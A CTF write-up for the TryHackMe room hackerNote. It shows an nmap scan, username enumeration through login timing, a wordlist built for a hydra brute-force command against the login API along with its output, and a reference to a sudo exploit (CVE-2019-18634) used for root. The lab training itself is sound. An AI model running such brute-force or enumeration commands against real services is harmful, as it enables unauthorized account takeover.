WriteUp — THM hackerNote
A custom webapp, introducing username enumeration, custom wordlists and a basic privilege escalation exploit.
This is a writeup for TryHackMe room hackerNote.
Reconnaissance
Start with NMAP scan:
nmap -sC -sV -p- 10.10.31.138 1 ⨯
Starting Nmap 7.80 ( https://nmap.org ) at 2020–10–17 13:56 EEST
Nmap scan report for 10.10.31.138
Host is up (0.053s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 10:a6:95:34:62:b0:56:2a:38:15:77:58:f4:f3:6c:ac (RSA)
| 256 6f:18:27:a4:e7:21:9d:4e:6d:55:b3:ac:c5:2d:d5:d3 (ECDSA)
|_ 256 2d:c3:1b:58:4d:c3:5d:8e:6a:f6:37:9d:ca:ad:20:7c (ED25519)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Home — hackerNote
8080/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Home — hackerNote
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelThree open ports, SSH and a custom web app. Let’s take a look.
Investigate
Make a user account with a,1,a. Try logging in with proper and invalid credentials and users. I notice that logging in with a proper username but wrong password takes considerably longer than with invalid username.
Exploit
Let’s make a timing attack to figure out usernames. I pick malenames-usa-top1000.txt as a dictionary from SecLists:
And craft a Python program to do the attack:
Based on running this script james is a valid username.
Attack Passwords
Let’s start by obtaining a password hint from the web application:
Using the provided files let’s combine them to a word list for attack:
/usr/lib/hashcat-utils/combinator.bin colors.txt numbers.txt > attacklist.txtFeed the list to hydra:
hydra -l james -P attacklist.txt 10.10.31.138 http-post-form ‘/api/user/login:username=^USER^&password=^PASS^:Invalid’
Hydra v9.1 © 2020 by van Hauser/THC & David Maciejak — Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020–10–17 15:05:46
[DATA] max 16 tasks per 1 server, overall 16 tasks, 180 login tries (l:1/p:180), ~12 tries per task
[DATA] attacking http-post-form://10.10.31.138:80/api/user/login:username=^USER^&password=^PASS^:Invalid
[STATUS] 48.00 tries/min, 48 tries in 00:01h, 132 to do in 00:03h, 16 active
[80][http-post-form] host: 10.10.31.138 login: james password: __REDACTED__
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020–10–17 15:07:02
Log in as james and retrieve SSH password from his notes. Login to the server and retrieve user flag.
Escalate
Based on the instructions the box is vulnerable to CVE-2019-18634. Get the exploit, compile and run on the box to get the root flag.